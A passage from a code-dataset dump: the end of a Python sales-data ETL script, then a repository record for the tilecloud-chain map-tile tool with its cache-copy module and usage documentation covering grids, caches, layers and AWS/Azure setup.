except:\n print('Not possible creating Customer_catalogue CSV File')\n logger.logger.error('Not possible creating Customer_catalogue CSV File')\n\ndef main():\n\n try:\n user_inputs = getting_user_input()\n root_path = user_inputs[0]\n country = user_inputs[1]\n STR_indicator = user_inputs[2]\n except:\n print('Not possible getting user input')\n os.system('pause')\n sys.exit()\n\n try:\n system_paths_dataframes_and_root_path = getting_system_paths(root_path, country, STR_indicator)\n system_paths = system_paths_dataframes_and_root_path[:5]\n root_path = system_paths_dataframes_and_root_path[5]\n entrepidus_stock_file_path = system_paths_dataframes_and_root_path[6]\n except:\n logger.logger.error('Not possible getting_system_paths')\n print('Not possible getting_system_paths')\n os.system('pause')\n sys.exit()\n\n try:\n print('Loading data frames...')\n dataframes = loading_dataframes(system_paths)\n df_sales = dataframes[0]\n df_pebac_product_reference = dataframes[1]\n df_product_master = dataframes[2]\n df_customer_catalog = dataframes[3]\n df_dist_names = dataframes[4]\n except:\n logger.logger.error('Not possible loading DataFrames')\n print('Not possible loading DataFrames')\n os.system('pause')\n sys.exit()\n\n try:\n print('Cleaning sales.txt file...')\n df_sales = sanitizing_sales_file(df_sales)\n except:\n logger.logger.error('Not possible sanitizing_sales_file')\n print('Not able to execute - sanitizing_sales_file function')\n os.system('pause')\n sys.exit()\n\n try:\n print('Cleaning df_pebac_product_reference...')\n df_pebac_product_reference = sanitizing_df_pebac_product_reference(df_pebac_product_reference)\n except:\n logger.logger.error('Not possible sanitizing_df_pebac_product_reference function')\n print('Not possible execute sanitizing_df_pebac_product_reference function')\n os.system('pause')\n sys.exit()\n\n try:\n print('Setting Entrepidus...')\n df_entrepidus = declaring_entrepidus_df()\n except:\n logger.logger.error('Not possible creating Entrepidus')\n print('Not possible creating Entrepidus')\n os.system('pause')\n sys.exit()\n\n try:\n print('Assigning sales to entrepidus...')\n dataframes_entrepidus_and_sales = setting_df_entrepidus_and_sales(df_entrepidus, df_sales)\n df_entrepidus = dataframes_entrepidus_and_sales[0]\n df_sales = dataframes_entrepidus_and_sales[1]\n except:\n logger.logger.error('Not possible executing function setting_df_entrepidus_and_sales')\n print('Not possible executing function setting_df_entrepidus_and_sales')\n os.system('pause')\n sys.exit()\n\n try:\n print('assigning_dist_names_and_country_to_entrepidus')\n df_entrepidus = assigning_dist_names_and_country_to_entrepidus(df_entrepidus, df_dist_names)\n except:\n logger.logger.error('Not possible executing function setting_df_entrepidus_and_sales')\n print('Not possible assigning dist_names_and_country to entrepidus')\n\n try:\n print('Filtering current and previous month...')\n previous_and_current_month_period = get_previous_and_current_month_period()\n except: \n logger.logger.error('Not possible executing function setting_df_entrepidus_and_sales')\n print('Not possible executing function setting_df_entrepidus_and_sales')\n\n try:\n print('Searching Diageo Skus...')\n df_entrepidus = searching_diageo_sku(df_sales, df_pebac_product_reference, df_entrepidus)\n except:\n logger.logger.error('Not possible executing function searching_diageo_sku')\n print('Not possible executing function searching_diageo_sku')\n os.system('pause')\n sys.exit()\n\n try:\n print('Filling product details...')\n df_entrepidus = filling_product_details(df_entrepidus, df_product_master)\n except:\n logger.logger.error('Not possible executing function filling_product_details')\n print('Not possible filling_product_details')\n os.system('pause')\n sys.exit()\n\n try:\n print('Calculating quantity...')\n df_entrepidus = calculating_quantity(df_entrepidus, df_pebac_product_reference)\n except:\n logger.logger.error('Not possible executing function calculating_quantity')\n print('Not possible calculating products quantities using pebac_product_reference file')\n os.system('pause')\n sys.exit()\n\n try:\n print('Getting store names...')\n mapping_stores = getting_store_name(df_entrepidus, df_customer_catalog)\n df_entrepidus = mapping_stores[0]\n new_stores = mapping_stores[1]\n except:\n logger.logger.error('Not possible executing function getting_store_name')\n print('Not possible getting store names')\n os.system('pause')\n sys.exit()\n \n try:\n print('Creating new stores dataframe...')\n df_new_stores = creating_new_stores_dataframe()\n except:\n logger.logger.error('Not possible executing function creating_new_stores_dataframe')\n print('Not possible creating_new_stores_dataframe')\n\n try:\n print('Registering new stores...')\n df_new_stores = registering_new_stores(new_stores, df_new_stores)\n except:\n logger.logger.error('Not possible executing function registering_new_stores')\n print('Not possible creating_new_stores_dataframe')\n\n try:\n print('Checking tax values columns...')\n df_entrepidus = verifying_values_with_without_tax(df_entrepidus)\n except:\n logger.logger.error('Not possible verifying_values_with_without_tax(df_entrepidus)')\n print('Not possible verifying_values_with_without_tax(df_entrepidus')\n\n try:\n print('Formatting Entrepidus...')\n df_entrepidus = entrepidus_formatting(df_entrepidus)\n except:\n logger.logger.error('Not possible executing function entrepidus_formatting')\n print('Not possible formatting Entrepidus')\n os.system('pause')\n sys.exit()\n \n try:\n print('Searching stock file...')\n result_finding_stock_file = loading_stock_file(entrepidus_stock_file_path)\n except:\n logger.logger.info('Not possible executing loading_stock_file')\n finally:\n found_stock_file = result_finding_stock_file[0]\n if ( found_stock_file == True ):\n try:\n df_entrepidus_stock = result_finding_stock_file[1]\n except:\n logger.logger.info('Not possible creating DataFrame df_entrepidus_stock')\n print('Not possible creating DataFrame df_entrepidus_stock')\n \n #Just getting into that function if df_stock is not false\n if found_stock_file:\n try:\n print('Checking stock file...')\n df_entrepidus_stock = formatting_stock_file(df_entrepidus_stock)\n except:\n logger.logger.info('Not possible executing formatting_stock_file')\n \n #Just getting into that function if df_stock is not false\n if found_stock_file:\n try:\n print('Appending stock file into entrepidus sales...')\n df_entrepidus = appending_entrepidus_stock_to_entrepidus_sales(df_entrepidus_stock, df_entrepidus)\n except:\n logger.logger.info('Not possible executing formatting_stock_file')\n print('Not posible appending Stock to Entrepidus')\n\n try: \n print('Creating CSV files...')\n creating_csv_files(df_entrepidus, df_new_stores, root_path)\n except:\n logger.logger.error('Not possible executing function creating_excel_file')\n print('Not possible executing function creating_excel_file')\n print('** Please make sure that a previous generated Entrepidus in the same folder is not open **\\n')\n os.system('pause')\n sys.exit()\n\n\n print('Successfully executed')\n os.system('pause')\n\n\nif __name__ == '__main__':\n main()\n" } ]
1
camptocamp/tilecloud-chain
https://github.com/camptocamp/tilecloud-chain
f87c1f9a53afd24cbf3e828bba809f54ff776038
7fda47e75463f56caf49962ddcba0929f07d730b
4d6aa5bf60dee291a7e74dc5b81ff7956e8e7c68
refs/heads/master
2023-08-06T23:52:31.445303
2023-08-02T02:35:57
2023-08-02T02:50:36
5,898,459
29
6
BSD-2-Clause
2012-09-21T08:10:43
2023-07-28T10:14:40
2023-09-04T13:07:14
Python
[ { "alpha_fraction": 0.5974171757698059, "alphanum_fraction": 0.5996631383895874, "avg_line_length": 33.92156982421875, "blob_id": "12a0b80131b95a98583889efe13320a999b50238", "content_id": "fa825449cce851705c4d667c4ddbd4bf6efc6374", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5343, "license_type": "permissive", "max_line_length": 107, "num_lines": 153, "path": "/tilecloud_chain/copy_.py", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "import logging\nimport os\nimport sys\nfrom argparse import ArgumentParser, Namespace\nfrom typing import cast\n\nimport tilecloud_chain.configuration\nfrom tilecloud_chain import Count, DropEmpty, HashDropper, TileGeneration, add_common_options\nfrom tilecloud_chain.format import duration_format, size_format\n\nlogger = logging.getLogger(__name__)\n\n\nclass Copy:\n \"\"\"Copy the tiles from a cache to an other.\"\"\"\n\n count = None\n\n def copy(\n self,\n options: Namespace,\n gene: TileGeneration,\n layer: str,\n source: str,\n destination: str,\n task_name: str,\n ) -> None:\n self._copy(options, gene, layer, source, destination, task_name)\n\n def _copy(\n self,\n options: Namespace,\n gene: TileGeneration,\n layer_name: str,\n source: str,\n dest: str,\n task_name: str,\n ) -> None:\n # disable metatiles\n assert gene.config_file\n config = gene.get_config(gene.config_file)\n layer = config.config[\"layers\"][layer_name]\n cast(tilecloud_chain.configuration.LayerWms, layer)[\"meta\"] = False\n count_tiles_dropped = Count()\n\n gene.create_log_tiles_error(layer_name)\n source_tilestore = gene.get_tilesstore(source)\n dest_tilestore = gene.get_tilesstore(dest)\n gene.init_tilecoords(config, layer_name)\n gene.add_geom_filter()\n gene.add_logger()\n gene.get(source_tilestore, \"Get the tiles\")\n gene.imap(DropEmpty(gene))\n # Discard tiles with certain content\n if \"empty_tile_detection\" in layer:\n empty_tile = layer[\"empty_tile_detection\"]\n\n gene.imap(\n HashDropper(\n empty_tile[\"size\"], empty_tile[\"hash\"], store=dest_tilestore, count=count_tiles_dropped\n )\n )\n\n if options.process:\n gene.process(options.process)\n\n gene.imap(DropEmpty(gene))\n self.count = gene.counter_size()\n gene.put(dest_tilestore, \"Store the tiles\")\n gene.consume()\n if not options.quiet:\n print(\n f\"\"\"The tile {task_name} of layer '{layer_name}' is finish\nNb {task_name} tiles: {self.count.nb}\nNb errored tiles: {gene.error}\nNb dropped tiles: {count_tiles_dropped.nb}\nTotal time: {duration_format(gene.duration)}\nTotal size: {size_format(self.count.size)}\nTime per tile: {(gene.duration / self.count.nb * 1000).seconds if self.count.nb != 0 else 0} ms\nSize per tile: {self.count.size / self.count.nb if self.count.nb != 0 else -1} o\n\"\"\"\n )\n\n\ndef main() -> None:\n \"\"\"Copy the tiles from a cache to an other.\"\"\"\n try:\n parser = ArgumentParser(\n description=\"Used to copy the tiles from a cache to an other\", prog=sys.argv[0]\n )\n add_common_options(parser, near=False, time=False, dimensions=True, cache=False)\n parser.add_argument(\"--process\", dest=\"process\", metavar=\"NAME\", help=\"The process name to do\")\n parser.add_argument(\"source\", metavar=\"SOURCE\", help=\"The source cache\")\n parser.add_argument(\"dest\", metavar=\"DEST\", help=\"The destination cache\")\n\n options = parser.parse_args()\n\n gene = TileGeneration(options.config, options)\n assert gene.config_file\n config = gene.get_config(gene.config_file)\n\n if options.layer:\n copy = Copy()\n copy.copy(options, gene, options.layer, options.source, options.dest, \"copy\")\n else:\n layers = (\n config.config[\"generation\"][\"default_layers\"]\n if \"default_layers\" in config.config[\"generation\"]\n else config.config[\"layers\"].keys()\n )\n for layer in layers:\n copy = Copy()\n copy.copy(options, gene, layer, options.source, options.dest, \"copy\")\n except SystemExit:\n raise\n except: # pylint: disable=bare-except\n logger.exception(\"Exit with exception\")\n if os.environ.get(\"TESTS\", \"false\").lower() == \"true\":\n raise\n sys.exit(1)\n\n\ndef process() -> None:\n \"\"\"Copy the tiles from a cache to an other.\"\"\"\n try:\n parser = ArgumentParser(\n description=\"Used to copy the tiles from a cache to an other\", prog=sys.argv[0]\n )\n add_common_options(parser, near=False, time=False, dimensions=True)\n parser.add_argument(\"process\", metavar=\"PROCESS\", help=\"The process name to do\")\n\n options = parser.parse_args()\n\n gene = TileGeneration(options.config, options, multi_thread=False)\n\n copy = Copy()\n if options.layer:\n copy.copy(options, gene, options.layer, options.cache, options.cache, \"process\")\n else:\n assert gene.config_file\n config = gene.get_config(gene.config_file)\n layers_name = (\n config.config[\"generation\"][\"default_layers\"]\n if \"default_layers\" in config.config.get(\"generation\", {})\n else config.config[\"layers\"].keys()\n )\n for layer in layers_name:\n copy.copy(options, gene, layer, options.cache, options.cache, \"process\")\n except SystemExit:\n raise\n except: # pylint: disable=bare-except\n logger.exception(\"Exit with exception\")\n sys.exit(1)\n" }, { "alpha_fraction": 0.6592249870300293, "alphanum_fraction": 0.6705415844917297, "avg_line_length": 29.15936279296875, "blob_id": "c126891cb0402bd67a0a8e1137be01371cef993d", "content_id": "ab74953f8ffaada49ebef2d9cdabaf389e347160", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 22710, "license_type": "permissive", "max_line_length": 120, "num_lines": 753, "path": "/tilecloud_chain/USAGE.rst", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "Configure\n---------\n\nConfigure grids\n~~~~~~~~~~~~~~~\n\nThe ``grid`` describes how the tiles are arranged.\n\nEspecially on ``s3`` or ``azure`` be careful to choose every of the grid settings before generating the\ntiles. If you change one of them you must regenerate all the tiles.\n\nThe ``resolutions`` in [px/m] describes all the resolutions available for this layer. For a raster layer, have\na look to the maximum resolution of the source files. It is not needed to generate tiles at smaller\nresolutions than the sources, it is preferable to use the OpenLayers client zoom. Note that you can add a\nresolution in the end without regenerating all the tiles.\n\nThe ``bbox`` should match the resolution of the extent. **CAREFUL: you will have big issue if you use this\nparameter to generate the tile on a restricted area**: use the ``bbox`` on the layer instead.\n\nThe ``srs`` specifies the code of the projection.\n\nThe ``unit`` is the unit used by the projection.\n\nThe ``tile_size`` is the tile size in [px], defaults to 256.\n\nThe ``matrix_identifier`` is ``zoom`` by default and can also be set to ``resolution``. It specifies how the z\nindex is build to store the tiles, for example, for the resolutions ``[2, 1, 0.5]`` the used values are\n``[0, 1, 2]`` based on the zoom and ``[2, 1, 0_5]`` based on the resolution. The second has the advantage of\nallowing to add a new resolution without regenerating all the tiles, but it does not work with MapCache.\n\nConfigure caches\n~~~~~~~~~~~~~~~~\n\nThe available tile caches are: ``s3``, ``azure``, ``bsddb``, ``mbtile`` and ``filesystem``.\n\nThe best solution to store the tiles, ``s3``, ``azure``, ``mbtiles`` and ``bsddb``, have the advantage of using only one\nfile per layer - style dimensions. To serve the ``mbtile`` and the ``bsddb`` see Distribute the tiles.\n\n``s3`` needs a ``bucket`` and a ``folder`` (defaults to '').\n\n``azure`` needs a ``container``.\n\n``mbtiles``, ``bsddb`` and ``filesystem`` just need a ``folder``.\n\nOn all the caches we can add some information to generate the URL where the tiles are available. This is\nneeded to generate the capabilities. We can specify:\n\n- ``http_url`` direct url to the tiles root.\n- ``http_urls`` (array) urls to the tiles root.\n- ``http_url`` and ``hosts`` (array), where each value of ``hosts`` is used to replace ``%(host)s`` in\n ``http_url``.\n\nIn all case ``http_url`` or ``http_urls`` can include all attributes of this cache as ``%(attribute)s``.\n\nMBTiles vs Berkeley DB (``bsddb``)\n^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\n- Read performance: similar, eventually the MBTiles is 10% faster.\n- Write performance: The Berkeley DB is largely faster, about 10 times.\n- List the tiles: the MBTiles is largely faster, but we usually don't need it.\n\nConfigure layers\n~~~~~~~~~~~~~~~~\n\nFirst, all the attributes in ``layer_default`` are copied in all the layers to define the default values.\n\nWe have two ``type`` of layer: ``wms`` or ``mapnik``.\n\nTo start the common attributes are:\n\n``min_resolution_seed`` the minimum resolution that is seeded, other resolutions are served by MapCache.\n\n``bbox`` used to limit the tiles generation.\n\n``px_buffer`` a buffer in px around the object area (geoms or extent).\n\nWMTS layout\n^^^^^^^^^^^\n\nTo generate the file paths and the WMTS capabilities we need additional information:\n\nThe ``mime_type`` of the tiles, it's also used by the WMS GetMap and to upload the tiles.\n\nThe ``wmts_style`` defaults to 'default'.\n\nThe ``extension`` is used to end the filename.\n\nThe ``dimensions`` (defaults to []) is an array of objects that have a ``name``, a ``default`` value specified\nin the capabilities, a ``value`` to generate the tiles (it can be overwritten by an argument), and an array of\n``values`` that contains all the possible values available in the capabilities.\n\nFor example if you generate the tiles and capabilities with the following configuration:\n\n.. code:: yaml\n\n dimensions:\n - name: DATE\n default: 2012\n value: 2012\n values: [2012]\n\nthen with the following configuration:\n\n.. code:: yaml\n\n dimensions:\n - name: DATE\n default: 2012\n value: 2013\n values: [2012, 2013]\n\nWe will have two set of tiles ``2012`` and ``2013``, both accessible by the capabilities, and by default we\nwill see the first set of tiles.\n\nMeta tiles\n^^^^^^^^^^\n\nThe meta tiles are activated by setting ``meta`` to ``on`` (by default it's ``off``).\n\nThe meta tiles are used for two things: first to generate multiple tiles with only one WMS query. By setting\n``meta_size`` to 8 we will generate a square of 8 by 8 tiles in one shot.\n\nThe second usage of meta tiles is prevent cut label names: this is solved by getting a bigger image and cutting\nthe borders. The ``meta_buffer`` should be set to a bigger value than half the size of the longest label.\n\nConfigure hash\n^^^^^^^^^^^^^^\n\nWe can filter tiles and meta tiles by using an hash.\n\nThe configuration of this hash is in the layer like this:\n\n.. code:: yaml\n\n empty_metatile_detection:\n size: 740\n hash: 3237839c217b51b8a9644d596982f342f8041546\n empty_tile_detection:\n size: 921\n hash: 1e3da153be87a493c4c71198366485f290cad43c\n\nTo easily generate this configuration we can use the following command:\n\n::\n\n generate-tiles --get-hash <z/x/y> -l <layer_name>\n\nWhere ``<z/x/y>`` should refer to an empty tile/metatile. Generally it's a good idea to use z as the maximum\nzoom, x and y as 0.\n\nConfigure geom/sql\n^^^^^^^^^^^^^^^^^^\n\nWe can generate the tiles only on some geometries stored in PostGis.\n\nThe configuration is in the layer like this:\n\n.. code:: yaml\n\n geoms:\n - connection: user=www-data password=www-data dbname=<db> host=localhost\n sql: <column> AS geom FROM <table>\n min_resolution: <resolution> # included, optional, last win\n max_resolution: <resolution> # included, optional, last win\n\nExample:\n\n.. code:: yaml\n\n geoms:\n - connection: user=postgres password=postgres dbname=tests host=localhost\n sql: the_geom AS geom FROM tests.polygon\n - connection: user=postgres password=postgres dbname=tests host=localhost\n sql: the_geom AS geom FROM tests.point\n min_resolution: 10\n max_resolution: 20\n\nIt's preferable to use simple geometries, too complex geometries can slow down the generation.\n\nLegends\n^^^^^^^\n\nTo be able to generate legends with ``generate-controller --generate-legend-images`` you should have\n``legend_mime`` and ``legend_extension`` in the layer configuration.\n\nfor example:\n\n.. code:: yaml\n\n legend_mime: image/png\n legend_extension: png\n\nThen it will create a legend image per layer and per zoom level named\n``.../1.0.0/{{layer}}/{{wmts_style}}/legend{{zoom}}.{{legend_extension}}`` only if she is different from the\nprevious zoom level. If we have only one legend image it still stores in the file named\n``legend0.{{legend_extension}}``.\n\nWhen we do ``generate-controller --generate-wmts-capabilities`` we will at first parse the legend images to\ngenerate a layer configuration like this:\n\n.. code:: yaml\n\n legends:\n - mime_type: image/png\n href: http://host/tiles/layer/style/legend0.png\n min_resolution: 500 # optional, [m/px]\n max_resolution: 2000 # optional, [m/px]\n min_scale: # if define overwrite the min_resolution [m/m]\n max_scale: # if define overwrite the max_resolution [m/m]\n\nIf you define a legends array in the layer configuration it is directly used to generate the capabilities.\n\nWMS layers\n^^^^^^^^^^\n\nThe additional value needed by the WMS is the URL of the server and the ``layers``.\n\nThe previously defined ``mime_type`` is also used in the WMS requests.\n\nTo customize the request you also have the attributes ``params``, ``headers`` and ``generate_salt``. In\n``params`` you can specify additional parameter of the WMS request, in ``headers`` you can modify the request\nheaders. In ``version``, you can change the WMS version. See the Proxy/cache issue for additional information.\n\nMapnik layers\n^^^^^^^^^^^^^\n\nWe need to specify the ``mapfile`` path.\n\nWith Mapnik we have the possibility to specify a ``data_buffer`` then we should set the unneeded\n``meta_buffer`` to 0.\n\nAnd the ``output_format`` used for the Mapnik renderer, can be ``png``, ``png256``, ``jpeg``, ``grid``\n(grid_renderer).\n\nMapnik grid layers\n''''''''''''''''''\n\nWith Mapnik we can generate UTFGrid tiles (JSON format that describes the tiles present on a corresponding\ntile) by using the ``output_format`` 'grid', see also:\nhttps://github.com/mapnik/mapnik/wiki/MapnikRenderers#grid_renderer.\n\nSpecific configuration:\n\nWe have a specific way to ``drop_empty_utfgrid`` by using the ``on`` value.\n\nWe should specify the pseudo pixel size [px] with the ``resolution``.\n\nAnd the ``layers_fields`` that we want to get the attributes. Object with the layer name as key and the values\nin an array as value.\n\nIn fact the Mapnik documentation says that's working only for one layer.\n\nAnd don't forget to change the ``extension`` to ``json``, and the ``mime_type`` to ``application/utfgrid`` and\nthe ``meta`` to ``off`` (not supported).\n\nConfiguration example:\n\n.. code:: yaml\n\n grid:\n type: mapnik\n mapfile: style.mapnik\n output_format: grid\n extension: json\n mime_type: application/utfgrid\n drop_empty_utfgrid: on\n resolution: 4\n meta: off\n data_buffer: 128\n layers_fields:\n buildings: [name, street]\n\nProcess\n~~~~~~~\n\nWe can configure some tile commands to process the tiles. They can be automatically be called in the tile\ngeneration it we set the property ``post_process`` or ``pre_hash_post_process`` in the layer configuration.\n\nThe process is a set of names processes, and each one has a list of commands declared like this:\n\n.. code:: yaml\n\n process: # root process config\n optipng: # the process command\n - cmd: optipng %(args)s -q -zc9 -zm8 -zs3 -f5 -o %(out)s %(in)s # the command line\n need_out: true # if false the command rewrite the input file, default is false\n arg: # argument used with the different log switches, in all cases default is ''\n default: '-q' # the argument used by default\n quiet: '-q' # the argument used in quiet mode\n verbose: '-v' # the argument used in verbose mode\n debug: '-log /tmp/optipng.log' # the argument user in debug mode\n\nThe ``cmd`` can have the following optional argument:\n\n- ``args`` the argument configured in the arg section.\n- ``in``, ``out`` the input and output files.\n- ``x``, ``y``, ``z`` the tile coordinates.\n\nLogging\n~~~~~~~\n\nTile logs can be saved to a PostgreSQL database with this configuration:\n\n..code:: yaml\n\n logging:\n database:\n dbname: my_db\n host: db\n port: 5432\n table: tilecloud_logs\n\n PostgreSQL authentication can be specified with the ``PGUSER`` and ``PGPASSWORD`` environment variables.\n If the database is not reachable, the process will wait until it is.\n\n\nTiles error file\n~~~~~~~~~~~~~~~~\n\nIf we set a file path in configuration file:\n\n.. code:: yaml\n\n generation:\n error_file: <path>\n\nThe tiles that's in error will be append to the file, ant the tiles can be regenerated with\n``generate-tiles --tiles <path>``.\n\nThe ``<path>`` can be ``/tmp/error_{layer}_{datetime:%Y-%m-%d_%H:%M:%S}`` to have one file per layer and per\nrun.\n\nThe tiles file looks like:\n\n``{.sourceCode .} # [time] some comments z/x/y # [time] the error z/x/y:+m/+m # [time] the error``\n\nThe first line is just a comment, the second, is for an error on a tile, and the third is for an error on a\nmeta tile.\n\nProxy/cache issue\n~~~~~~~~~~~~~~~~~\n\nIn general we shouldn't generate tiles throw a proxy, to do that you should configure the layers as this:\n\n.. code:: yaml\n\n layers_name:\n url: http://localhost/wms\n headers:\n Host: the_host_name\n\nThe idea is to get the WMS server on ``localhost`` and use the ``Host`` header to select the right Apache\nVirtualHost.\n\nTo don't have cache we use the as default the headers:\n\n.. code:: yaml\n\n headers:\n Cache-Control: no-cache, no-store\n Pragma: no-cache\n\nAnd if you steal have issue you can add a ``SALT`` random argument by setting the layer parameter\n``generate_salt`` to ``true``.\n\nAlternate mime type\n~~~~~~~~~~~~~~~~~~~\n\nBy default TileCloud support only the ``image/jpeg`` and ``image/png`` mime type.\n\nAmazon services\n---------------\n\nAuthentication\n~~~~~~~~~~~~~~\n\nTo be authenticated by Amazon you should set those environments variable before running a command:\n\n.. prompt:: bash\n\n export AWS_ACCESS_KEY_ID=...\n export AWS_SECRET_ACCESS_KEY=...\n\nConfigure S3\n~~~~~~~~~~~~\n\nThe cache configuration is like this:\n\n.. code:: yaml\n\n s3:\n type: s3\n # the s3 bucket name\n bucket: tiles\n # the used folder in the bucket [default is '']\n folder: ''\n # for GetCapabilities\n http_url: https://%(host)s/%(bucket)s/%(folder)s/\n cache_control: 'public, max-age=14400'\n hosts:\n - wmts0.<host>\n\nThe bucket should already exists. If you don't use Amazon's S3, you must specify the ``host`` and the\n``tiles_url`` configuration parameter.\n\nConfigure SQS\n~~~~~~~~~~~~~\n\nThe configuration in layer is like this:\n\n.. code:: yaml\n\n sqs:\n # The region where the SQS queue is\n region: eu-west-1\n # The SQS queue name, it should already exists\n queue: the_name\n\nThe queue should be used only by one layer.\n\nTo use the SQS queue we should first fill the queue:\n\n.. prompt:: bash\n\n generate-tiles --role master --layer <a_layer>\n\nAnd then generate the tiles present in the SQS queue:\n\n.. prompt:: bash\n\n generate-tiles --role slave --layer <a_layer>\n\nFor the slave to keep listening when the queue is empty and be able to support more than one layer, you must\nenable the daemon mode and must not specify the layer:\n\n.. prompt:: bash\n\n generate-tiles --role slave --daemon\n\nConfigure SNS\n~~~~~~~~~~~~~\n\nSNS can be used to send a message when the generation ends.\n\nThe configuration is like this:\n\n.. code:: yaml\n\n sns:\n topic: arn:aws:sns:eu-west-1:your-account-id:tilecloud\n region: eu-west-1\n\nThe topic should already exists.\n\nAmazon tool\n~~~~~~~~~~~\n\nAmazon has a command line tool (`homepage <http://aws.amazon.com/fr/cli/>`__).\n\nTo use it, add in the ``setup.py``:\n\n- ``awscli`` as an ``install_requires``,\n- ``'aws = awscli.clidriver:main',`` in the ``console_scripts``.\n\nThan install it:\n\n.. code:: bash\n\n pip install awscli\n\nAnd use it:\n\n.. code:: bash\n\n aws help\n\nFor example to delete many tiles do:\n\n.. code:: bash\n\n aws s3 rm --recursive s3://your_bucket_name/folder\n\n\nConfigure Azure\n~~~~~~~~~~~~~~~\n\nThe cache configuration is like this:\n\n.. code:: yaml\n\n azure:\n type: azure\n # the Azure container name\n container: tiles\n # the used folder in the container [default is '']\n folder: ''\n # for GetCapabilities\n http_url: https://%(host)s/%(bucket)s/%(folder)s/\n cache_control: 'public, max-age=14400'\n hosts:\n - wmts0.<host>\n\nThe container should already exists.\n\nFor the authentication you should set those environment variables:\n``AZURE_STORAGE_CONNECTION_STRING`` on your local environment,\nor ``AZURE_STORAGE_ACCOUNT_URL`` if you run your container on Azure.\n\n\nOther related configuration\n---------------------------\n\nConfigure the server\n--------------------\n\nThe server can be configure as it:\n\n.. code:: yaml\n\n server:\n layers: a_layer # Restrict to serve an certain number of layers [default is all]\n cache: mbtiles # The used cache [default use generation/default_cache]\n # the URL without location to MapCache, [default is http://localhost/]\n geoms_redirect: true # use the geoms to redirect to MapCache [default is false]\n # allowed extension in the static path (default value), not used for s3.\n static_allow_extension: [jpeg, png, xml, js, html, css]\n\nThe minimal configuration is to enable it:\n\n.. code:: yaml\n\n server: {}\n\nYou should also configure the ``http_url`` of the used cache, to something like\n``https://%(host)s/${instanceid}/tiles`` or like ``https://%(host)s/${instanceid}/wsgi/tiles`` if you use the\nPyramid view.\n\nPyramid view\n~~~~~~~~~~~~\n\nTo use the pyramid view use the following configuration:\n\n.. code:: python\n\n config.get_settings().update({\n 'tilegeneration_configfile': '<the configuration file>',\n })\n config.add_route('tiles', '/tiles/\\*path')\n config.add_view('tilecloud_chain.server:PyramidView', route_name='tiles')\n\nInternal WSGI server\n~~~~~~~~~~~~~~~~~~~~\n\nin ``production.ini``:\n\n.. code::\n\n [app:tiles]\n use = egg:tilecloud_chain#server\n configfile = %(here)s/tilegeneration/config.yaml\n\nwith the Apache configuration:\n\n.. code::\n\n WSGIDaemonProcess tiles:${instanceid} display-name=%{GROUP} user=${modwsgi_user}\n WSGIScriptAlias /${instanceid}/tiles ${directory}/apache/wmts.wsgi\n <Location /${instanceid}/tiles>\n WSGIProcessGroup tiles:${instanceid}\n WSGIApplicationGroup %{GLOBAL}\n </Location>\n\nCommands\n--------\n\nAvailable commands\n~~~~~~~~~~~~~~~~~~\n\n- ``generate-controller`` generate the annex files like legend.\n- ``generate-tiles`` generate the tiles.\n- ``generate-copy`` copy the tiles from a cache to an other.\n- ``generate-process`` process the tiles using a configured process.\n- ``generate-cost`` estimate the cost.\n- ``import_expiretiles`` import the osm2pgsql expire-tiles file as geoms in the database.\n\nEach commands have a ``--help`` option to give a full arguments help.\n\nGenerate tiles\n~~~~~~~~~~~~~~\n\nGenerate all the tiles:\n\n.. prompt:: bash\n\n generate-tiles\n\nGenerate a specific layer:\n\n.. prompt:: bash\n\n generate-tiles --layer <a_layer>\n\nGenerate a specific zoom:\n\n.. prompt:: bash\n\n generate-tiles --zoom 5\n\nGenerate a specific zoom range:\n\n.. prompt:: bash\n\n generate-tiles --zoom 2-8\n\nGenerate a specific some zoom levels:\n\n.. prompt:: bash\n\n generate-tiles --zoom 2,4,7\n\nGenerate tiles from an (error) tiles file:\n\n.. prompt:: bash\n\n generate-tiles --layer <a_layer> --tiles <z/x/y>\n\nGenerate tiles on a bbox:\n\n.. prompt:: bash\n\n generate-tiles --bbox <MINX> <MINY> <MAXX> <MAXY>\n\nGenerate a tiles near a tile coordinate (useful for test):\n\n.. prompt:: bash\n\n generate-tiles --near <X> <Y>\n\nGenerate a tiles in a different cache than the default one:\n\n.. prompt:: bash\n\n generate-tiles --cache <a_cache>\n\n\nExplain cost\n------------\n\nConfiguration (default values):\n\n.. code:: yaml\n\n cost:\n # [nb/month]\n request_per_layers: 10000000\n cloudfront:\n download: 0.12,\n get: 0.009\n request_per_layers: 10000000\n s3:\n download: 0.12,\n get: 0.01,\n put: 0.01,\n storage: 0.125\n sqs:\n request: 0.01\n\nLayer configuration (default values):\n\n.. code:: yaml\n\n cost:\n metatile_generation_time: 30.0,\n tile_generation_time: 30.0,\n tile_size: 20.0,\n tileonly_generation_time: 60.0\n\nThe following commands can be used to know the time and cost to do generation:\n\n.. prompt:: bash\n\n generate-controller --cost\n\nUseful options\n~~~~~~~~~~~~~~\n\n``--quiet`` or ``-q``: used to display only errors.\n\n``--verbose`` or ``-v``: used to display info messages.\n\n``--debug`` or ``-d``: used to display debug message, please use this option to report issue. With the debug\nmode we don't catch exceptions, and we don't log time messages.\n\n``--test <n>`` or ``-t <n>``: used to generate only ``<n>`` tiles, useful for test.\n\n\nMutualized\n----------\n\nThe mutualized mode consist by having multiple project files with the projects related configurations\n(layers, cache, ...) and one main configuration file with the global configuration (number of process,\nlog format, redis, ...).\n\nConfiguration keys which should be set in the main configuration file are identified in property's\ndescriptions of the ``schema.json`` file.\n\nImportant remarks\n-----------------\n\nEspecially on S3 the grid name, the layer name, the dimensions, can't be changed (understand if we want to\nchange them we should regenerate all the tiles).\n\nBy default we also can't insert a zoom level, if you think that you need it we can set the grid property\n``matrix_identifier: resolution``, bit it don't work with MapCache.\n\nPlease use the ``--debug`` to report issue.\n\nEnvironment variables\n---------------------\n\n- ``TILEGENERATION_CONFIGFILE``: Default to ``/etc/tilegeneration/config.yaml``, the all in one\n configuration file to use.\n- ``TILEGENERATION_MAIN_CONFIGFILE``: Default to ``/etc/tilegeneration/config.yaml``, the main\n configuration file to use.\n- ``TILEGENERATION_HOSTSFILE``: Default to ``/etc/tilegeneration/hosts.yaml``, the hosts to config file\n mapping file to use.\n- ``TILE_NB_THREAD``: Default is 